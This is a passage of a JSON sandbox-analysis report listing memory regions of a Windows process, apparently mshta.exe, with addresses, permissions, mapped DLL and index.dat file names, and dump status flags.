"00:01:03.158", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 462848, "start_va": 8791772299264, "type": "region", "version": 1 }, "end_va": 8791772762111, "entry_point": 8791772372512, "filename": "\\Windows\\System32\\shlwapi.dll", "id": "region_770", "name": "shlwapi.dll", "norm_filename": "c:\\windows\\system32\\shlwapi.dll", "region_type": "memory_mapped_file", "start_va": 8791772299264, "timestamp": "00:01:03.159", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 2461696, 
"start_va": 8791763845120, "type": "region", "version": 1 }, "end_va": 8791766306815, "entry_point": 8791763850048, "filename": "\\Windows\\System32\\iertutil.dll", "id": "region_771", "name": "iertutil.dll", "norm_filename": "c:\\windows\\system32\\iertutil.dll", "region_type": "memory_mapped_file", "start_va": 8791763845120, "timestamp": "00:01:03.160", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 880640, "start_va": 8791762862080, "type": "region", "version": 1 }, "end_va": 8791763742719, "entry_point": 8791762874996, "filename": "\\Windows\\System32\\oleaut32.dll", "id": "region_772", "name": "oleaut32.dll", "norm_filename": "c:\\windows\\system32\\oleaut32.dll", "region_type": "memory_mapped_file", "start_va": 8791762862080, "timestamp": "00:01:03.161", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1470464, "start_va": 8791756374016, "type": "region", "version": 1 }, "end_va": 8791757844479, "entry_point": 8791756378304, "filename": "\\Windows\\System32\\crypt32.dll", "id": "region_773", "name": "crypt32.dll", "norm_filename": "c:\\windows\\system32\\crypt32.dll", "region_type": "memory_mapped_file", "start_va": 8791756374016, "timestamp": "00:01:03.162", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 61440, "start_va": 8791756046336, "type": "region", "version": 1 }, "end_va": 8791756107775, "entry_point": 8791756050464, "filename": "\\Windows\\System32\\msasn1.dll", "id": 
"region_774", "name": "msasn1.dll", "norm_filename": "c:\\windows\\system32\\msasn1.dll", "region_type": "memory_mapped_file", "start_va": 8791756046336, "timestamp": "00:01:03.163", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 241664, "start_va": 8791630807040, "type": "region", "version": 1 }, "end_va": 8791631048703, "entry_point": 8791630807040, "filename": "\\Windows\\System32\\msls31.dll", "id": "region_775", "name": "msls31.dll", "norm_filename": "c:\\windows\\system32\\msls31.dll", "region_type": "memory_mapped_file", "start_va": 8791630807040, "timestamp": "00:01:03.164", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 49152, "start_va": 8791740448768, "type": "region", "version": 1 }, "end_va": 8791740497919, "entry_point": 8791740452964, "filename": "\\Windows\\System32\\version.dll", "id": "region_776", "name": "version.dll", "norm_filename": "c:\\windows\\system32\\version.dll", "region_type": "memory_mapped_file", "start_va": 8791740448768, "timestamp": "00:01:03.172", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 167936, "start_va": 1835008, "type": "region", "version": 1 }, "end_va": 2002943, "entry_point": 1839120, "filename": "\\Windows\\System32\\imm32.dll", "id": "region_777", "name": "imm32.dll", "norm_filename": "c:\\windows\\system32\\imm32.dll", "region_type": "memory_mapped_file", "start_va": 1835008, "timestamp": "00:01:03.173", "type": "region", "version": 1 }, { "dump": { 
"filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1605632, "start_va": 6553600, "type": "region", "version": 1 }, "end_va": 8159231, "entry_point": 0, "filename": null, "id": "region_778", "name": "pagefile_0x0000000000640000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 6553600, "timestamp": "00:01:03.174", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 188416, "start_va": 8791759519744, "type": "region", "version": 1 }, "end_va": 8791759708159, "entry_point": 8791759523856, "filename": "\\Windows\\System32\\imm32.dll", "id": "region_780", "name": "imm32.dll", "norm_filename": "c:\\windows\\system32\\imm32.dll", "region_type": "memory_mapped_file", "start_va": 8791759519744, "timestamp": "00:01:03.175", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1085440, "start_va": 8791788683264, "type": "region", "version": 1 }, "end_va": 8791789768703, "entry_point": 8791788687460, "filename": "\\Windows\\System32\\msctf.dll", "id": "region_781", "name": "msctf.dll", "norm_filename": "c:\\windows\\system32\\msctf.dll", "region_type": "memory_mapped_file", "start_va": 8791788683264, "timestamp": "00:01:03.176", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1576960, 
"start_va": 8192000, "type": "region", "version": 1 }, "end_va": 9768959, "entry_point": 0, "filename": null, "id": "region_782", "name": "pagefile_0x00000000007d0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 8192000, "timestamp": "00:01:03.178", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 20971520, "start_va": 9830400, "type": "region", "version": 1 }, "end_va": 30801919, "entry_point": 0, "filename": null, "id": "region_783", "name": "pagefile_0x0000000000960000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 9830400, "timestamp": "00:01:03.179", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 28672, "start_va": 131072, "type": "region", "version": 1 }, "end_va": 159743, "entry_point": 0, "filename": null, "id": "region_804", "name": "pagefile_0x0000000000020000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 131072, "timestamp": "00:01:03.200", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 8192, "start_va": 1835008, "type": "region", "version": 1 }, "end_va": 1843199, "entry_point": 0, "filename": null, "id": "region_805", "name": "pagefile_0x00000000001c0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 1835008, "timestamp": "00:01:03.200", "type": "region", "version": 1 }, 
{ "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 1900544, "type": "region", "version": 1 }, "end_va": 1904639, "entry_point": 1900544, "filename": "\\Windows\\System32\\en-US\\mshta.exe.mui", "id": "region_806", "name": "mshta.exe.mui", "norm_filename": "c:\\windows\\system32\\en-us\\mshta.exe.mui", "region_type": "memory_mapped_file", "start_va": 1900544, "timestamp": "00:01:03.200", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000822-addr_0x00000000001e0000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_135", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 1966080, "type": "region", "version": 1 }, "end_va": 1970175, "entry_point": 0, "filename": null, "id": "region_822", "name": "private_0x00000000001e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 1966080, "timestamp": "00:01:03.304", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000823-addr_0x00000000001f0000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_136", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2031616, "type": "region", "version": 1 }, "end_va": 2035711, "entry_point": 0, "filename": null, "id": "region_823", "name": "private_0x00000000001f0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2031616, "timestamp": "00:01:03.304", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No 
dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 61440, "start_va": 8791754276864, "type": "region", "version": 1 }, "end_va": 8791754338303, "entry_point": 8791754280976, "filename": "\\Windows\\System32\\cryptbase.dll", "id": "region_835", "name": "cryptbase.dll", "norm_filename": "c:\\windows\\system32\\cryptbase.dll", "region_type": "memory_mapped_file", "start_va": 8791754276864, "timestamp": "00:01:03.368", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 2097152, "type": "region", "version": 1 }, "end_va": 2101247, "entry_point": 0, "filename": null, "id": "region_836", "name": "pagefile_0x0000000000200000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2097152, "timestamp": "00:01:03.428", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 31850496, "type": "region", "version": 1 }, "end_va": 32899071, "entry_point": 0, "filename": null, "id": "region_843", "name": "private_0x0000000001e60000", "norm_filename": null, "region_type": "private_memory", "start_va": 31850496, "timestamp": "00:01:03.440", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000844-addr_0x000007fffffdc000-size_0x0000000000002000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_137", "ref_source": "summary", "ref_type": "process_dump", "type": 
"reference", "version": 1 }, "size": 8192, "start_va": 8796092874752, "type": "region", "version": 1 }, "end_va": 8796092882943, "entry_point": 0, "filename": null, "id": "region_844", "name": "private_0x000007fffffdc000", "norm_filename": null, "region_type": "private_memory", "start_va": 8796092874752, "timestamp": "00:01:03.440", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000845-addr_0x0000000000210000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_138", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2162688, "type": "region", "version": 1 }, "end_va": 2166783, "entry_point": 0, "filename": null, "id": "region_845", "name": "private_0x0000000000210000", "norm_filename": null, "region_type": "private_memory", "start_va": 2162688, "timestamp": "00:01:03.441", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 512000, "start_va": 2359296, "type": "region", "version": 1 }, "end_va": 2871295, "entry_point": 2412232, "filename": "\\Windows\\System32\\rpcss.dll", "id": "region_850", "name": "rpcss.dll", "norm_filename": "c:\\windows\\system32\\rpcss.dll", "region_type": "memory_mapped_file", "start_va": 2359296, "timestamp": "00:01:03.479", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 352256, "start_va": 8791719804928, "type": "region", "version": 1 }, "end_va": 8791720157183, "entry_point": 8791719852992, "filename": "\\Windows\\System32\\uxtheme.dll", "id": "region_852", 
"name": "uxtheme.dll", "norm_filename": "c:\\windows\\system32\\uxtheme.dll", "region_type": "memory_mapped_file", "start_va": 8791719804928, "timestamp": "00:01:03.483", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000853-addr_0x0000000001f60000-size_0x0000000000160000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_140", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1441792, "start_va": 32899072, "type": "region", "version": 1 }, "end_va": 34340863, "entry_point": 0, "filename": null, "id": "region_853", "name": "private_0x0000000001f60000", "norm_filename": null, "region_type": "private_memory", "start_va": 32899072, "timestamp": "00:01:03.484", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 913408, "start_va": 30801920, "type": "region", "version": 1 }, "end_va": 31715327, "entry_point": 0, "filename": null, "id": "region_856", "name": "pagefile_0x0000000001d60000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 30801920, "timestamp": "00:01:03.494", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 98304, "start_va": 8791715741696, "type": "region", "version": 1 }, "end_va": 8791715839999, "entry_point": 8791715746096, "filename": "\\Windows\\System32\\dwmapi.dll", "id": "region_857", "name": "dwmapi.dll", "norm_filename": "c:\\windows\\system32\\dwmapi.dll", "region_type": "memory_mapped_file", "start_va": 8791715741696, "timestamp": 
"00:01:03.498", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 2945024, "start_va": 34340864, "type": "region", "version": 1 }, "end_va": 37285887, "entry_point": 34340864, "filename": "\\Windows\\Globalization\\Sorting\\SortDefault.nls", "id": "region_858", "name": "sortdefault.nls", "norm_filename": "c:\\windows\\globalization\\sorting\\sortdefault.nls", "region_type": "memory_mapped_file", "start_va": 34340864, "timestamp": "00:01:03.504", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 184320, "start_va": 8791738548224, "type": "region", "version": 1 }, "end_va": 8791738732543, "entry_point": 8791738552336, "filename": "\\Windows\\System32\\ntmarta.dll", "id": "region_859", "name": "ntmarta.dll", "norm_filename": "c:\\windows\\system32\\ntmarta.dll", "region_type": "memory_mapped_file", "start_va": 8791738548224, "timestamp": "00:01:03.506", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 335872, "start_va": 8791772823552, "type": "region", "version": 1 }, "end_va": 8791773159423, "entry_point": 8791772827860, "filename": "\\Windows\\System32\\Wldap32.dll", "id": "region_860", "name": "wldap32.dll", "norm_filename": "c:\\windows\\system32\\wldap32.dll", "region_type": "memory_mapped_file", "start_va": 8791772823552, "timestamp": "00:01:03.507", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions 
are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 3420160, "start_va": 37289984, "type": "region", "version": 1 }, "end_va": 40710143, "entry_point": 0, "filename": null, "id": "region_861", "name": "pagefile_0x0000000002390000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 37289984, "timestamp": "00:01:03.510", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 151552, "start_va": 8791754080256, "type": "region", "version": 1 }, "end_va": 8791754231807, "entry_point": 8791754118744, "filename": "\\Windows\\System32\\sspicli.dll", "id": "region_862", "name": "sspicli.dll", "norm_filename": "c:\\windows\\system32\\sspicli.dll", "region_type": "memory_mapped_file", "start_va": 8791754080256, "timestamp": "00:01:03.511", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 14188544, "start_va": 8791773216768, "type": "region", "version": 1 }, "end_va": 8791787405311, "entry_point": 8791773728444, "filename": "\\Windows\\System32\\shell32.dll", "id": "region_873", "name": "shell32.dll", "norm_filename": "c:\\windows\\system32\\shell32.dll", "region_type": "memory_mapped_file", "start_va": 8791773216768, "timestamp": "00:01:03.543", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 2228224, "type": "region", "version": 1 }, "end_va": 2232319, "entry_point": 0, 
"filename": null, "id": "region_874", "name": "pagefile_0x0000000000220000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2228224, "timestamp": "00:01:03.546", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 61440, "start_va": 8791755390976, "type": "region", "version": 1 }, "end_va": 8791755452415, "entry_point": 8791755397552, "filename": "\\Windows\\System32\\profapi.dll", "id": "region_875", "name": "profapi.dll", "norm_filename": "c:\\windows\\system32\\profapi.dll", "region_type": "memory_mapped_file", "start_va": 8791755390976, "timestamp": "00:01:03.548", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 49152, "start_va": 2359296, "type": "region", "version": 1 }, "end_va": 2408447, "entry_point": 2359296, "filename": "\\Users\\aETAdzjz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\index.dat", "id": "region_876", "name": "index.dat", "norm_filename": "c:\\users\\aetadzjz\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.ie5\\index.dat", "region_type": "memory_mapped_file", "start_va": 2359296, "timestamp": "00:01:03.555", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 32768, "start_va": 2424832, "type": "region", "version": 1 }, "end_va": 2457599, "entry_point": 2424832, "filename": "\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\index.dat", "id": "region_877", "name": "index.dat", 
"norm_filename": "c:\\users\\aetadzjz\\appdata\\roaming\\microsoft\\windows\\cookies\\index.dat", "region_type": "memory_mapped_file", "start_va": 2424832, "timestamp": "00:01:03.556", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 2490368, "type": "region", "version": 1 }, "end_va": 2555903, "entry_point": 2490368, "filename": "\\Users\\aETAdzjz\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\index.dat", "id": "region_878", "name": "index.dat", "norm_filename": "c:\\users\\aetadzjz\\appdata\\local\\microsoft\\windows\\history\\history.ie5\\index.dat", "region_type": "memory_mapped_file", "start_va": 2490368, "timestamp": "00:01:03.557", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 2555904, "type": "region", "version": 1 }, "end_va": 2818047, "entry_point": 2555904, "filename": "\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\IETldCache\\index.dat", "id": "region_879", "name": "index.dat", "norm_filename": "c:\\users\\aetadzjz\\appdata\\roaming\\microsoft\\windows\\ietldcache\\index.dat", "region_type": "memory_mapped_file", "start_va": 2555904, "timestamp": "00:01:03.558", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 2818048, "type": "region", "version": 1 }, "end_va": 2822143, "entry_point": 0, "filename": null, "id": "region_883", "name": "pagefile_0x00000000002b0000", 
"norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2818048, "timestamp": "00:01:03.569", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 626688, "start_va": 8791770071040, "type": "region", "version": 1 }, "end_va": 8791770697727, "entry_point": 8791770078224, "filename": "\\Windows\\System32\\clbcatq.dll", "id": "region_884", "name": "clbcatq.dll", "norm_filename": "c:\\windows\\system32\\clbcatq.dll", "region_type": "memory_mapped_file", "start_va": 8791770071040, "timestamp": "00:01:03.570", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 2883584, "type": "region", "version": 1 }, "end_va": 2887679, "entry_point": 0, "filename": null, "id": "region_885", "name": "pagefile_0x00000000002c0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2883584, "timestamp": "00:01:03.572", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 6094848, "type": "region", "version": 1 }, "end_va": 6098943, "entry_point": 6094848, "filename": "\\Windows\\WindowsShell.Manifest", "id": "region_891", "name": "windowsshell.manifest", "norm_filename": "c:\\windows\\windowsshell.manifest", "region_type": "memory_mapped_file", "start_va": 6094848, "timestamp": "00:01:03.587", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile 
backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8192, "start_va": 6160384, "type": "region", "version": 1 }, "end_va": 6168575, "entry_point": 0, "filename": null, "id": "region_892", "name": "pagefile_0x00000000005e0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 6160384, "timestamp": "00:01:03.588", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 2048000, "start_va": 8791731339264, "type": "region", "version": 1 }, "end_va": 8791733387263, "entry_point": 8791732963620, "filename": "\\Windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\\comctl32.dll", "id": "region_893", "name": "comctl32.dll", "norm_filename": "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\\comctl32.dll", "region_type": "memory_mapped_file", "start_va": 8791731339264, "timestamp": "00:01:03.589", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8192, "start_va": 6225920, "type": "region", "version": 1 }, "end_va": 6234111, "entry_point": 0, "filename": null, "id": "region_895", "name": "pagefile_0x00000000005f0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 6225920, "timestamp": "00:01:03.591", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", 
"writable" ], "ref_process_dump": null, "size": 4096, "start_va": 6094848, "type": "region", "version": 1 }, "end_va": 6098943, "entry_point": 0, "filename": null, "id": "region_897", "name": "pagefile_0x00000000005d0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 6094848, "timestamp": "00:01:03.630", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8192, "start_va": 6291456, "type": "region", "version": 1 }, "end_va": 6299647, "entry_point": 0, "filename": null, "id": "region_912", "name": "pagefile_0x0000000000600000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 6291456, "timestamp": "00:01:03.736", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 315392, "start_va": 8791770726400, "type": "region", "version": 1 }, "end_va": 8791771041791, "entry_point": 8791770730608, "filename": "\\Windows\\System32\\ws2_32.dll", "id": "region_913", "name": "ws2_32.dll", "norm_filename": "c:\\windows\\system32\\ws2_32.dll", "region_type": "memory_mapped_file", "start_va": 8791770726400, "timestamp": "00:01:03.736", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 32768, "start_va": 8791791501312, "type": "region", "version": 1 }, "end_va": 8791791534079, "entry_point": 8791791506692, "filename": "\\Windows\\System32\\nsi.dll", "id": "region_914", "name": "nsi.dll", "norm_filename": "c:\\windows\\system32\\nsi.dll", 
"region_type": "memory_mapped_file", "start_va": 8791791501312, "timestamp": "00:01:03.737", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000915-addr_0x0000000001f60000-size_0x00000000000a0000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_143", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 655360, "start_va": 32899072, "type": "region", "version": 1 }, "end_va": 33554431, "entry_point": 0, "filename": null, "id": "region_915", "name": "private_0x0000000001f60000", "norm_filename": null, "region_type": "private_memory", "start_va": 32899072, "timestamp": "00:01:03.739", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000916-addr_0x0000000002040000-size_0x0000000000080000-perm_rw.bin", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_144", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 524288, "start_va": 33816576, "type": "region", "version": 1 }, "end_va": 34340863, "entry_point": 0, "filename": null, "id": "region_916", "name": "private_0x0000000002040000", "norm_filename": null, "region_type": "private_memory", "start_va": 33816576, "timestamp": "00:01:03.739", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 372736, "start_va": 8791746019328, "type": "region", "version": 1 }, "end_va": 8791746392063, "entry_point": 8791746046272, "filename": "\\Windows\\System32\\dnsapi.dll", "id": "region_917", "name": "dnsapi.dll", 
"norm_filename": "c:\\windows\\system32\\dnsapi.dll", "region_type": "memory_mapped_file", "start_va": 8791746019328, "timestamp": "00:01:03.743", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000918-addr_0x00000000026e0000-size_0x0000000000190000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_145", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1638400, "start_va": 40763392, "type": "region", "version": 1 }, "end_va": 42401791, "entry_point": 0, "filename": null, "id": "region_918", "name": "private_0x00000000026e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 40763392, "timestamp": "00:01:03.745", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 159744, "start_va": 8791728717824, "type": "region", "version": 1 }, "end_va": 8791728877567, "entry_point": 8791728756924, "filename": "\\Windows\\System32\\IPHLPAPI.DLL", "id": "region_919", "name": "iphlpapi.dll", "norm_filename": "c:\\windows\\system32\\iphlpapi.dll", "region_type": "memory_mapped_file", "start_va": 8791728717824, "timestamp": "00:01:03.746", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 45056, "start_va": 8791728652288, "type": "region", "version": 1 }, 